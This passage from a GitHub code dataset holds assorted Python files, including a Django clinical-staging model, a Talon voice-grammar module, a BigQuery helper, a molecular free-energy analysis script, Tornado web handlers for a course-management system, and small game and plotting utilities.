editable=False)\n\n who_stage = models.CharField(\n verbose_name='WHO stage',\n max_length=25,\n choices=WHO_STAGE,\n default=UNKNOWN)\n\n history = HistoricalRecords()\n\n class Meta(CrfModelMixin.Meta):\n app_label = 'ba_namotswe'\n verbose_name = 'WHO Staging'\n verbose_name_plural = 'WHO Staging'\n\n\nclass WhoDiagnosis(CrfInlineModelMixin):\n\n who_staging = models.ForeignKey(WhoStaging)\n\n dx = models.CharField(\n max_length=200,\n choices=WHO_DEFINING_ILLNESSES)\n\n dx_date = models.DateField(\n null=True,\n blank=True,\n help_text='Provide if known')\n\n history = HistoricalRecords()\n\n class 
Meta(CrfInlineModelMixin.Meta):\n app_label = 'ba_namotswe'\n verbose_name = 'WHO Diagnosis'\n verbose_name_plural = 'WHO Diagnosis'\n unique_together = (('who_staging', 'dx', 'dx_date'), )\n crf_inline_parent = 'who_staging'\n","repo_name":"botswana-harvard/ba-namotswe","sub_path":"ba_namotswe/models/who_staging.py","file_name":"who_staging.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19174956451","text":"from dataclasses import dataclass\nfrom typing import Optional\n\nfrom talon import Module\n\nfrom .target_types import ImplicitTarget, PrimitiveTarget, RangeTarget, RangeTargetType\n\nmod = Module()\n\nmod.list(\n \"cursorless_range_connective\",\n desc=\"A range joiner that indicates whether to include or exclude anchor and active\",\n)\n\n\n@dataclass\nclass RangeConnective:\n excludeAnchor: bool\n excludeActive: bool\n\n\n@dataclass\nclass RangeConnectiveWithType:\n connective: RangeConnective\n type: Optional[RangeTargetType]\n\n\n@mod.capture(rule=\"{user.cursorless_range_connective}\")\ndef cursorless_range_connective(m) -> RangeConnective:\n return RangeConnective(\n m.cursorless_range_connective in [\"rangeExclusive\", \"rangeExcludingStart\"],\n m.cursorless_range_connective in [\"rangeExclusive\", \"rangeExcludingEnd\"],\n )\n\n\n@mod.capture(\n rule=\"[] | \"\n)\ndef cursorless_range_connective_with_type(m) -> RangeConnectiveWithType:\n return RangeConnectiveWithType(\n getattr(m, \"cursorless_range_connective\", RangeConnective(False, False)),\n getattr(m, \"cursorless_range_type\", None),\n )\n\n\n@mod.capture(\n rule=(\n \"[] \"\n )\n)\ndef cursorless_range_target(m) -> RangeTarget:\n primitive_targets: list[PrimitiveTarget] = m.cursorless_primitive_target_list\n range_connective_with_type: RangeConnectiveWithType = (\n m.cursorless_range_connective_with_type\n )\n range_connective = range_connective_with_type.connective\n\n anchor = ImplicitTarget() if len(primitive_targets) == 1 else primitive_targets[0]\n\n return RangeTarget(\n anchor,\n primitive_targets[-1],\n range_connective.excludeAnchor,\n range_connective.excludeActive,\n range_connective_with_type.type,\n )\n","repo_name":"cursorless-dev/cursorless","sub_path":"cursorless-talon/src/targets/range_target.py","file_name":"range_target.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":879,"dataset":"github-code","pt":"66"} +{"seq_id":"73562741009","text":"def spider_plot(df):\n '''\n retrieved from https://www.python-graph-gallery.com/391-radar-chart-with-several-individuals\n '''\n import matplotlib.pyplot as plt\n import pandas as pd\n from math import pi\n \n # number of variable\n categories=list(df)\n N = len(categories)\n \n # We are going to plot the first line of the data frame.\n # But we need to repeat the first value to close the circular graph:\n values=df.loc[0].values.flatten().tolist()\n values += values[:1]\n values\n \n # What will be the angle of each axis in the plot? 
(we divide the plot by the number of variables)\n angles = [n / float(N) * 2 * pi for n in range(N)]\n angles += angles[:1]\n \n # Initialise the spider plot\n fig = plt.figure()\n ax = plt.subplot(111, polar=True)\n \n # Draw one axe per variable + add labels\n plt.xticks(angles[:-1], categories, color='grey', size=8)\n \n # Draw ylabels\n ax.set_rlabel_position(0)\n plt.yticks([10,20,30], [\"10\",\"20\",\"30\"], color=\"grey\", size=7)\n plt.ylim(0,40)\n \n # Plot data\n ax.plot(angles, values, linewidth=1, linestyle='solid')\n \n # Fill area\n ax.fill(angles, values, 'b', alpha=0.1)\n \n # Show the graph\n return fig, ax\n","repo_name":"avichaychriqui/HeBERT","sub_path":"src/spider_plot.py","file_name":"spider_plot.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"66"} +{"seq_id":"33496774689","text":"from google.cloud import bigquery\n\n\nclass BigQueryWrapper():\n def __init__(self, project_name):\n self.client = bigquery.Client(project=project_name)\n\n def create_dataset(self, dataset_id):\n full_dataset_id = \"{}.{}\".format(self.client.project, dataset_id)\n dataset = bigquery.Dataset(full_dataset_id)\n dataset.location = \"us-east1\"\n dataset = self.client.create_dataset(dataset) # Make an API request.\n print(\"Created dataset {}.{}\".format(\n self.client.project, dataset.dataset_id))\n\n def create_table_from_storage(self, table_id, dataset, storage_uri):\n dataset_id = dataset\n table_id = table_id\n uri = storage_uri\n\n dataset_ref = self.client.dataset(dataset_id)\n\n job_config = bigquery.LoadJobConfig()\n job_config.autodetect = True\n job_config.source_format = bigquery.SourceFormat.CSV\n\n load_job = self.client.load_table_from_uri(\n uri, dataset_ref.table(table_id), job_config=job_config\n ) # API request\n print(\"Starting job {}\".format(load_job.job_id))\n\n load_job.result() # Waits for table load to complete.\n print(\"Job finished.\")\n\n destination_table = self.client.get_table(dataset_ref.table(table_id))\n print(\"Loaded {} rows.\".format(destination_table.num_rows))\n\n def query(self, query):\n # QUERY = (\n # 'SELECT * FROM {}.{}'.format(dataset_id, table_id))\n query_job = self.client.query(query) # API request\n rows = query_job.result() # Waits for query to finish\n\n for row in rows:\n print(row)\n\n\nif __name__ == \"__main__\":\n project_name = \"festive-magpie-279021\"\n dataset_id = \"teste_dataset\"\n table_id = \"comp_boss\"\n storage_uri = \"gs://teste_kaio/comp_boss.csv\"\n wrapper = BigQueryWrapper(project_name)\n wrapper.create_dataset(dataset_id)\n wrapper.create_table_from_storage(table_id, dataset_id, storage_uri)\n wrapper.query(\"SELECT * FROM {}.{}\".format(dataset_id, table_id))\n","repo_name":"Kaiohenriqueps/gcp_example","sub_path":"src/wrappers/bigquery_wrapper.py","file_name":"bigquery_wrapper.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72595156369","text":"from players import Player\nfrom robot import Robot\nfrom auxfunc import check_win, ALL_MOVES\n\n\nclass Game:\n def __init__(self, config):\n # for some reason the ALL_MOVES constant becomes inaccessible or doesn't refresh after a restart unless we recompute it here\n self.available_moves = {(x, y) for x in range(0, 3) for y in range(0, 3)}\n # deal with leadership by letting the 1st player choose his mode\n self.p1 = Player(real=True, cross=config[0])\n # deal with the status of the remaining player\n self.p2 = 
Player(real=config[1], cross=not config[0])\n # this flag is used to distinguish between the two winners\n self.first_winner = None\n self.r = Robot(self.available_moves)\n # we'll use this flag to end our game and count a draw if the winner is still None\n self.end = False\n\n def step(self, first_turn, click_coord):\n robo_choice = False\n if first_turn:\n curr_player = self.p1\n else:\n curr_player = self.p2\n # handle the two types of possible players - real and ai\n if curr_player.role:\n curr_player.move(click_coord)\n else:\n self.r.strategy(self.p2.moves, self.available_moves)\n robo_choice = self.r.result[0]\n curr_player.move(robo_choice)\n print(self.r.result, \"ROBOT!\")\n # update available moves set\n try:\n self.available_moves.remove(curr_player.moves[-1])\n # unknown rare bug after game end, possibly a faulty mouse click event handler when I click too fast\n # sometimes the robot continues to work => overlaps used points, quite hard to catch that bug\n except KeyError:\n print('bug', self.available_moves, curr_player.moves[-1], self.end)\n # stop if no available_moves left\n if len(self.available_moves) == 0:\n self.end = True\n # check for winner\n if check_win(curr_player.moves):\n self.end = True\n if curr_player == self.p1:\n self.first_winner = True\n else:\n self.first_winner = False\n return robo_choice\n","repo_name":"Axik0/ttt","sub_path":"engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"33214741780","text":"class Comportameto:\n def __init__(self, jogador, posicao, probabilidade_50) -> None:\n from app.bo.bo_jogador import JogadorBo\n from app.bo.bo_tabuleiro import Tabuleiro\n\n self.jogador_bo = JogadorBo\n self.jogador = jogador\n self.posicao = posicao\n self.propriedade = Tabuleiro.tabuleiro\n self.probabilidade_50 = probabilidade_50\n\n def impulsivo(self):\n # The impulsive player buys any property he lands on.\n msg = self.jogador_bo.comprar(self.jogador, self.posicao)\n return msg\n\n def exigente(self):\n # The demanding player buys any property, as long as its rent is higher than 50.\n if self.propriedade[self.posicao].aluguel > 50:\n msg = self.jogador_bo.comprar(self.jogador, self.posicao)\n return msg\n else:\n return \"Falha\"\n\n def cauteloso(self):\n # The cautious player buys any property as long as he still has a reserve of 80 in balance\n # left over after the purchase is made.\n if (self.jogador.conta - self.propriedade[self.posicao].venda) >= 80:\n msg = self.jogador_bo.comprar(self.jogador, self.posicao)\n return msg\n else:\n return \"Falha\"\n\n def aleatorio(self):\n # The random player buys the property he lands on with a probability of 50%.\n msg = (\n self.jogador_bo.comprar(self.jogador, self.posicao)\n if self.probabilidade_50 == 2\n else \"Falha\"\n )\n return msg\n","repo_name":"gesilva1991/brasilprev","sub_path":"app/comportamento.py","file_name":"comportamento.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34557310018","text":"# A class that draws the spirograph.\r\n\r\nimport turtle\r\n\r\nclass Spiro():\r\n \"\"\"A class that will draw the spirographs.\"\"\"\r\n def __init__(self, xc, yc, col, R, r, l):\r\n \"\"\"Initializing the class turtle attributes\"\"\"\r\n \r\n # Create the turtle object.\r\n self.t = turtle.Turtle()\r\n # Set the cursor 
shape.\r\n self.t.shape('turtle')\r\n # Set the step in degrees.\r\n self.step = 5\r\n # set the drawing complete flag.\r\n self.drawingComplete = False\r\n \r\n # Set the parameters.\r\n self.setparams(xc, yc, col, R, r, l)\r\n \r\n # Initialize the drawing.\r\n self.restart()\r\n \r\n # call timer\r\n turtle.ontimer(self.update, self.deltaT)","repo_name":"john-walter-munene/spirographs","sub_path":"spiral_constructor.py","file_name":"spiral_constructor.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1936312026","text":"import os\nimport sys\nimport time\nimport glob\nimport math\nimport pickle\nimport pymbar\nimport natsort\nimport warnings\nimport argparse \nimport alchemlyb\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\nfrom matplotlib import cm\nfrom rich.progress import track\nfrom pymbar.timeseries import detect_equilibration, subsample_correlated_data\nfrom alchemlyb.parsing.gmx import extract_u_nk, extract_dHdl\nfrom alchemlyb.preprocessing import subsampling\nfrom alchemlyb.estimators import TI, BAR, MBAR\n\ndef initialize(args):\n parser = argparse.ArgumentParser(\n description='This code performs free energy calculations given dhdl file(s) from GROMACS.')\n parser.add_argument('-d',\n '--dir',\n type=str,\n default='.',\n help='The directory where the dhdl files are.')\n parser.add_argument('-T',\n '--temp',\n type=float,\n default=298.15,\n help='The simulation temperature in Kelvin.')\n parser.add_argument('-b',\n '--bounds',\n nargs='+',\n default=[None, None],\n help='The lower and upper bounds (in ps) for truncating the data.')\n parser.add_argument('-n',\n '--n_replicas',\n type=int,\n required=True,\n help='The number of replicas. 
A number of 1 assumes expanded ensemble.')\n parser.add_argument('-s',\n '--spacing',\n type=int,\n default=1,\n help='The number of steps between samples to use in the timeseries.')\n\n args_parse = parser.parse_args(args)\n\n return args_parse \n\ndef preprocess_data(folders, temp, spacing, bounds=[None, None]):\n \"\"\"\n Preprocesses data with the following steps:\n - For each state, extract the dHdl and u_nk data from the *dhdl.xvg files and concatenate them\n - Truncate the equilibrium region and subsample the dataset with the statistical inefficiency\n - Concatenate dHdl/u_nk data of all replicas\n\n Parameters\n ----------\n folders : list\n A list of folders where the dhdl files reside.\n temp : float\n The simulation temperature in Kelvin.\n spacing : int\n The number of steps between samples to use in the timeseries.\n bounds : list\n The lower and upper bounds for truncating the data.\n\n Returns\n -------\n dHdl_data : pd.Dataframe\n The preprocessed dHdl data that can serve as the input to free energy estimators.\n u_nk_data : pd.Dataframe\n The preprocessed u_nk data that can serve as the input to free energy estimators.\n \"\"\"\n dHdl_data, u_nk_data = [], []\n for i in range(len(folders)):\n if len(folders) > 1:\n logger(f'\\nData preprocessing for state {i}')\n files = glob.glob(os.path.join(folders[i], '*dhdl*xvg*'))\n files = natsort.natsorted(files, reverse=False)\n\n print(f' Collecting data for the following files: {\", \".join(files)}')\n print(' Subsampling the dHdl and u_nk data ...')\n dHdl = alchemlyb.concat([extract_dHdl(xvg, T=temp) for xvg in files])\n dHdl_series = subsampling.dhdl2series(dHdl)\n dHdl, dHdl_series = subsampling._prepare_input(dHdl, dHdl_series, drop_duplicates=True, sort=True)\n dHdl = subsampling.slicing(dHdl, lower=bounds[0], upper=bounds[1], step=spacing)\n dHdl_series = subsampling.slicing(dHdl_series, lower=bounds[0], upper=bounds[1], step=spacing)\n t, statinef, Neff_max = detect_equilibration(dHdl_series.values)\n print(f' Adopted spacing: {spacing: .0f}')\n print(f' {t / len(dHdl_series) * 100: .1f}% of the dHdl data was in the pre-equilibrium region and therefore discarded.')\n print(f' Statistical inefficiency of dHdl: {statinef: .1f}')\n print(f' Number of effective samples: {Neff_max}')\n dHdl_series_equil, dHdl_equil = dHdl_series[t:], dHdl[t:]\n indices = subsample_correlated_data(dHdl_series_equil, g=statinef)\n preprocessed_dHdl = dHdl_equil.iloc[indices]\n\n u_nk = alchemlyb.concat([extract_u_nk(xvg, T=temp) for xvg in files])\n u_nk_series = subsampling.u_nk2series(u_nk)\n u_nk, u_nk_series = subsampling._prepare_input(u_nk, u_nk_series, drop_duplicates=True, sort=True)\n u_nk = subsampling.slicing(u_nk, lower=bounds[0], upper=bounds[1], step=spacing)\n u_nk_series = subsampling.slicing(u_nk_series, lower=bounds[0], upper=bounds[1], step=spacing)\n t, statinef, Neff_max = detect_equilibration(u_nk_series.values)\n print(f' Adopted spacing: {spacing: .0f}')\n print(f' {t / len(u_nk_series) * 100: .1f}% of the u_nk data was in the pre-equilibrium region and therefore discarded.')\n print(f' Statistical inefficiency of u_nk: {statinef: .1f}')\n print(f' Number of effective samples: {Neff_max}')\n u_nk_series_equil, u_nk_equil = u_nk_series[t:], u_nk[t:]\n indices = subsample_correlated_data(u_nk_series_equil, g=statinef)\n preprocessed_u_nk = u_nk_equil.iloc[indices]\n\n dHdl_data.append(preprocessed_dHdl)\n u_nk_data.append(preprocessed_u_nk)\n \n # Finally, concatenate dHdl/u_nk data from different replicas as needed\n dHdl_data = alchemlyb.concat(dHdl_data)\n u_nk_data = alchemlyb.concat(u_nk_data)\n\n 
logger('Pickling the preprocessed dHdl/u_nk data ...')\n with open('dHdl_u_nk_data.pickle', 'wb') as handle:\n pickle.dump([dHdl_data, u_nk_data], handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n return dHdl_data, u_nk_data\n\ndef free_energy_calculation(dHdl, u_nk):\n logger('Fitting TI on dHdl ...')\n ti = TI().fit(dHdl)\n\n logger('Fitting BAR on u_nk ...')\n bar = BAR().fit(u_nk)\n\n logger('Fitting MBAR on u_nk ...\\n')\n try:\n mbar_stop = False\n mbar = MBAR().fit(u_nk)\n except pymbar.utils.ParameterError:\n mbar_stop = True\n logger(r\"\\sum_n W_nk is not equal to 1, probably due to insufficient overlap between states.\")\n logger(\"Stop using MBAR ...\")\n\n logger(\"------ Results based on the whole dataset ------\")\n logger(f\"TI: {ti.delta_f_.iloc[0, -1]:.4f} +/- {ti.d_delta_f_.iloc[0, -1]:.4f} kT\")\n logger(f\"BAR: {bar.delta_f_.iloc[0, -1]:.4f} +/- unknown kT\")\n\n if mbar_stop is False:\n logger(f\"MBAR: {mbar.delta_f_.iloc[0, -1]:.4f} +/- {mbar.d_delta_f_.iloc[0, -1]:.4f} kT\")\n logger(\"------------------------------------------------\")\n return ti, bar, mbar\n else:\n logger(\"------------------------------------------------\")\n return ti, bar\n\ndef get_overlap_matrix(u_nk):\n # sort by state so that rows from same state are in contiguous blocks\n u_nk = u_nk.sort_index(level=u_nk.index.names[1:])\n\n groups = u_nk.groupby(level=u_nk.index.names[1:])\n N_k = [(len(groups.get_group(i)) if i in groups.groups else 0) for i in u_nk.columns] \n\n MBAR = pymbar.mbar.MBAR(u_nk.T, N_k)\n overlap_matrix = np.array(MBAR.compute_overlap()['matrix'])\n\n return overlap_matrix\n\ndef plot_matrix(matrix, png_name, start_idx=0):\n sns.set_context(rc={\n 'family': 'sans-serif',\n 'sans-serif': ['DejaVu Sans'],\n 'size': 5\n })\n\n K = len(matrix)\n plt.figure(figsize=(K / 3, K / 3))\n annot_matrix = np.zeros([K, K]) # matrix for annotating values\n\n for i in range(K):\n for j in range(K):\n annot_matrix[i, j] = round(matrix[i, j], 2)\n\n x_tick_labels = y_tick_labels = np.arange(start_idx, start_idx + K)\n ax = sns.heatmap(matrix, cmap=\"YlGnBu\", linecolor='silver', linewidth=0.25,\n annot=annot_matrix, square=True, mask=matrix<0.005, fmt='.2f', cbar=False, xticklabels=x_tick_labels, yticklabels=y_tick_labels)\n ax.xaxis.tick_top()\n ax.tick_params(length=0)\n cmap = cm.get_cmap('YlGnBu') # to get the facecolor\n ax.set_facecolor(cmap(0)) # use the brightest color (value = 0)\n for _, spine in ax.spines.items():\n spine.set_visible(True) # add frames to the heat map\n plt.annotate(r'$\\lambda$', xy=(0, 0), xytext=(-0.45, -0.20))\n plt.title('Overlap matrix', fontsize=10, weight='bold')\n plt.tight_layout(pad=1.0)\n\n plt.savefig(png_name, dpi=600)\n #plt.show()\n plt.close()\n\ndef logger(*args, **kwargs):\n print(*args, **kwargs)\n with open(\"result.txt\", \"a\") as f:\n print(file=f, *args, **kwargs)\n\ndef main():\n # Suppress pandas FutureWarning\n warnings.simplefilter(action='ignore', category=FutureWarning)\n\n rc('font', **{\n 'family': 'sans-serif',\n 'sans-serif': ['DejaVu Sans'],\n 'size': 6\n })\n # Set the font used for MathJax - more on this later\n rc('mathtext', **{'default': 'regular'})\n plt.rc('font', family='serif')\n\n t1 = time.time()\n args = initialize(sys.argv[1:])\n\n logger(f'Commandline: {\" \".join(sys.argv)}')\n\n if os.path.isfile('dHdl_u_nk_data.pickle') is True:\n logger('Loading the 
preprocessed data dHdl and u_nk ...')\n with open('dHdl_u_nk_data.pickle', 'rb') as handle:\n data = pickle.load(handle)\n dHdl, u_nk = data[0], data[1]\n else:\n if args.n_replicas == 1:\n folders = [args.dir]\n else:\n folders = [f'{args.dir}/state_{i}' for i in range(args.n_replicas)]\n dHdl, u_nk = preprocess_data(folders, args.temp, args.spacing, args.bounds)\n\n logger('\\nPerforming free energy calculations on the whole dataset ...')\n output = free_energy_calculation(dHdl, u_nk)\n\n logger(\"\\nComputing and visualizing the overlap matrix ...\")\n matrix = get_overlap_matrix(u_nk)\n plot_matrix(matrix, 'overlap_matrix.png')\n t2 = time.time()\n logger(f\"Time elapsed: {t2 - t1:.0f} seconds.\")\n","repo_name":"wehs7661/REMD_analysis","sub_path":"REMD_analysis/calculate_free_energy.py","file_name":"calculate_free_energy.py","file_ext":"py","file_size_in_byte":10097,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"66"} +{"seq_id":"71090510612","text":"# pylint: disable=abstract-method\n# pylint: disable=arguments-differ\n# pylint: disable=attribute-defined-outside-init\n\nimport json\nfrom typing import Optional, Any\n\nimport tornado.escape\nimport tornado.web\n\nfrom tornado.web import (\n RequestHandler,\n authenticated,\n)\n\n\nclass PingHandler(RequestHandler):\n _response = {\n 'status': 'ok',\n }\n\n def get(self):\n self.write(self._response)\n self.set_status(200)\n self.finish()\n\n\nclass BaseHandler(RequestHandler):\n def write_error(self, status_code: int, **kwargs: Any) -> None:\n self.finish({\n 'code': status_code,\n 'msg': self._reason,\n })\n\n\nclass NotFoundHandler(BaseHandler):\n def prepare(self):\n raise tornado.web.HTTPError(\n status_code=404,\n reason=\"Invalid resource path.\"\n )\n\n\nclass UserHandler(BaseHandler):\n def initialize(self, user_factory):\n self.user_factory = user_factory\n self.body = dict()\n self.msg = None\n if self.request.body:\n try:\n self.body = tornado.escape.json_decode(self.request.body)\n except json.decoder.JSONDecodeError as exception:\n self.msg = f'could not parse body:\\n{str(exception)}'\n\n async def prepare(self): # pylint: disable=invalid-overridden-method\n if self.msg:\n self._bad_request(\n status=400,\n msg=self.msg,\n )\n\n def get_current_user(self) -> Optional[bytes]:\n return self.get_secure_cookie('user_id')\n\n def get_current_user_id(self) -> Optional[int]:\n user_id = self.get_current_user()\n if user_id:\n return int(user_id)\n return None\n\n def _bad_request(self, status=400, *, msg):\n self.set_status(status)\n self.write({\n 'status': 'err',\n 'msg': msg\n })\n self.finish()\n\n\nclass GetUserIdHandler(UserHandler):\n def get(self):\n user_id = self.get_current_user()\n if user_id:\n user_id = user_id.decode('utf-8')\n self.write({\n 'user_id': user_id\n })\n\n\nclass LoginHandler(UserHandler):\n def initialize(self, user_factory):\n super().initialize(user_factory=user_factory)\n self.email = self.body.get('email')\n self.password = self.body.get('password')\n\n def get(self):\n self.write({\n 'status': 'err',\n 'msg': 'use POST to login'\n })\n self.finish()\n\n async def post(self):\n user_id = await self.user_factory.login_user(email=self.email, password=self.password)\n if user_id:\n self.set_secure_cookie(\"user_id\", str(user_id))\n self.write({\n 'status': 'ok',\n 'msg': 'successfully logged in, set cookies in header',\n })\n else:\n self._bad_request(\n status=401,\n msg='incorrect email or password or user has not been registered'\n )\n\n\nclass 
ChangePasswordHandler(UserHandler):\n def initialize(self, user_factory):\n super().initialize(user_factory=user_factory)\n self.email = self.body.get('email')\n self.password = self.body.get('password')\n self.new_password = self.body.get('new_password')\n\n def get(self):\n self.write({\n 'status': 'err',\n 'msg': 'use POST'\n })\n self.finish()\n\n async def post(self):\n user_id = await self.user_factory.login_user(email=self.email, password=self.password)\n if not user_id:\n self._bad_request(\n status=401,\n msg='incorrect email or password or user has not been registered'\n )\n return\n user = await self.user_factory.get_student_or_professor(user_id=user_id, authenticated=True)\n update_result = await user.update_email_password(\n user_id=user_id,\n password=self.new_password,\n email=self.email\n )\n if update_result:\n self.write({\n 'status': 'ok',\n 'updated': True,\n 'msg': f'successfully changed password for user_id = {user_id}',\n })\n else:\n self.write({\n 'status': 'err',\n 'updated': False,\n 'msg': update_result.msg,\n })\n\n\nclass RegisterHandler(UserHandler):\n def initialize(self, user_factory):\n super().initialize(user_factory=user_factory)\n self.verification_code = self.body.get('verification_code')\n self.email = self.body.get('email')\n self.password = self.body.get('password')\n\n async def post(self):\n success, msg = await self.user_factory.register_user(\n verification_code=self.verification_code,\n email=self.email,\n password=self.password\n )\n if not success:\n self._bad_request(status=401, msg=msg)\n else:\n self.write({\n 'status': 'ok',\n 'msg': msg,\n })\n\n\nclass AuthUserHandler(UserHandler):\n def initialize(self, user_factory):\n super().initialize(user_factory=user_factory)\n\n async def prepare(self):\n await super().prepare()\n self.user_id = self.get_current_user_id()\n if self.user_id is None:\n raise tornado.web.HTTPError(403)\n self.user = await self.user_factory.get_student_or_professor(\n user_id=self.user_id\n )\n\n\nclass UserInfoHandler(UserHandler):\n def initialize(self, user_factory):\n super().initialize(user_factory)\n self.user_id = self.get_current_user_id()\n self.authenticated = self.user_id is not None\n if self.get_argument('user_id', default=None):\n self.user_id = self.get_argument('user_id')\n if self.user_id:\n self.user_id = int(self.user_id)\n self.authenticated &= self.user_id == self.get_current_user_id()\n\n async def prepare(self):\n await super().prepare()\n if self.user_id is not None:\n self.user = await self.user_factory.get_student_or_professor(\n user_id=self.user_id,\n authenticated=self.authenticated\n )\n\n def _doesnt_exist(self):\n self._bad_request(\n status=400,\n msg=f\"user_id {self.user_id} does not exist\"\n )\n\n async def get(self):\n if not self.user_id:\n self._bad_request(msg='expected authentication or user_id within GET argument')\n assert False\n info = await self.user.get_info()\n if not info:\n self._doesnt_exist()\n return\n self.write({\n 'status': 'ok',\n 'info': info,\n })\n\n @authenticated\n async def post(self):\n if self.user_id != self.get_current_user_id():\n self._bad_request(\n msg='could not perform update for other user, please verify user_id GET argument'\n )\n return\n to_update = self.body.get('update')\n if to_update is None:\n self._bad_request(\n msg='expected \"update\" property in body; POST request is used to modify user_info'\n )\n return\n update_result = await self.user.update_info(update=to_update)\n if update_result.success:\n self.write({\n 'status': 'ok',\n 
'updated': True,\n 'msg': f'successfully update info for user_id = {self.user_id}',\n })\n else:\n self.write({\n 'status': 'err',\n 'updated': False,\n 'msg': update_result.msg,\n })\n\n\nclass UserClassmatesHandler(AuthUserHandler):\n _CLASSMATE_FIELDS = ('user_id', 'name')\n\n async def prepare(self):\n await super().prepare()\n if await self.user.is_professor:\n self._bad_request(status=405, msg='method classmates is not allowed for professor')\n return\n self.classmates = await self.user.classmates()\n\n async def get(self):\n classmates = []\n for classmate in self.classmates:\n classmates.append(\n await classmate.get_info(properties=self._CLASSMATE_FIELDS)\n )\n self.write({\n 'status': 'ok',\n 'classmates': classmates,\n })\n\n\nclass UserCoursesHandler(AuthUserHandler):\n _COURSES_FIELDS = ('course_id', 'name')\n\n async def prepare(self):\n await super().prepare()\n self.courses = await self.user.courses()\n\n async def get(self):\n courses = [\n await course.get_info(properties=self._COURSES_FIELDS)\n for course in self.courses\n ]\n self.write({\n 'status': 'ok',\n 'courses': courses,\n })\n\n\nclass EditUserInfoHandler(AuthUserHandler):\n def initialize(self, user_factory):\n super().initialize(user_factory)\n self.update = self.body.get('update')\n\n async def prepare(self):\n await super().prepare()\n if not self.update:\n self._bad_request(msg='expected \"update\" parameter')\n for param in self.update:\n if param not in self.user.EDITABLE_PARAMS:\n self._bad_request(\n msg=f'unexpected field {param} does not exist or cannot be updated'\n )\n\n\nclass BaseCourseHandler(AuthUserHandler):\n def initialize(self, user_factory, course_class):\n super().initialize(user_factory)\n course_id = self.get_argument('course_id', default=None)\n if course_id:\n course_id = int(course_id)\n self.course = course_class(course_id=course_id)\n\n async def prepare(self):\n await super().prepare()\n if not self.course.course_id:\n self._bad_request(\n msg='expected course_id GET parameter'\n )\n return\n\n\nclass CourseInfoHandler(BaseCourseHandler):\n async def get(self):\n info = await self.course.get_info()\n if not info:\n self._bad_request(\n msg=f'course_id = {self.course.course_id} not found in courses'\n )\n return\n self.write({\n 'status': 'ok',\n 'info': info,\n })\n\n\nclass BaseCourseAssigneeHandler(BaseCourseHandler):\n def initialize(self, user_factory, course_class):\n super().initialize(user_factory=user_factory, course_class=course_class)\n self.assignee_name = self.get_argument('assignee_name', None)\n\n async def prepare(self):\n await super().prepare()\n if not self.assignee_name:\n self._bad_request(\n msg='expected assignee_name GET parameter'\n )\n return\n\n\nclass BaseAssigneeHandler(AuthUserHandler):\n def initialize(self, user_factory, course_class):\n super().initialize(user_factory=user_factory)\n self.course_class = course_class\n self.assignee_name = self.get_argument('assignee_name', None)\n self.course = None\n\n async def prepare(self):\n await super().prepare()\n if not self.assignee_name:\n self._bad_request(\n msg='expected assignee_name GET parameter'\n )\n return\n self.course = await self.course_class.resolve_assignee_course(assignee_name=self.assignee_name)\n if not self.course:\n self._bad_request(\n msg='assignee_name not found',\n )\n return\n\n\nclass AssigneeSubmitHandler(BaseAssigneeHandler):\n async def post(self):\n if await self.user.is_professor:\n self._bad_request(\n msg='only student can submit assignee',\n )\n return\n if not await 
self.course.check_assigned(user_id=self.user_id):\n self._bad_request(\n msg=f'user_id={self.user_id} is not assigned to course_id={self.course.course_id}'\n )\n return\n solution = self.body.get('solution', None)\n if not solution:\n self._bad_request(\n msg='expected non-empty \"solution\" field in body',\n )\n return\n submission = await self.course.submit_assignee(\n assignee_name=self.assignee_name,\n solution=solution,\n student_id=self.user_id\n )\n if not submission['success']:\n self._bad_request(\n msg=submission['msg']\n )\n return\n self.write({\n 'status': 'ok',\n 'result': submission['result'],\n })\n\n\nclass AssigneesViewerHandler(BaseAssigneeHandler):\n async def get(self):\n if not self.assignee_name:\n self._bad_request(\n msg='GET parameter assignee_name not found'\n )\n return\n if not await self.user.is_professor:\n self._bad_request(\n msg=f'user_id {self.user_id} is not a professor, forbidden'\n )\n return\n result = await self.course.get_assignees_grouped(assignee_name=self.assignee_name)\n self.write({\n 'status': 'ok',\n 'assignees': result,\n })\n","repo_name":"ulyanin/LMS","sub_path":"lms/web/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":13321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23451314081","text":"#!/usr/bin/env python\n# _*_ coding: UTF-8 _*_\n# Author:taoke\nfrom selenium import webdriver\ndriver = webdriver.Chrome()\ndriver.implicitly_wait(10)\ndriver.get('http://wenshu.court.gov.cn/content/content?DocID=f05b8b81-b647-11e3-84e9-5cf3fc0c2c18')\nelement = driver.find_element_by_id('Content')\n\ntext = driver.find_element_by_xpath(\"//*\").get_attribute(\"outerHTML\")\nwith open('1.txt','w',encoding='utf-8') as file:\n file.write(text)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"1052687889/webCrawler","sub_path":"文案网/wenan.py","file_name":"wenan.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"70471061332","text":"# pylint:disable = multiple-imports\nimport builtins, os, sys\n\nsys.path.append(os.path.join(os.path.dirname(__file__), \"..\"))\nfrom pypico8.math import flr\nfrom pypico8.table import 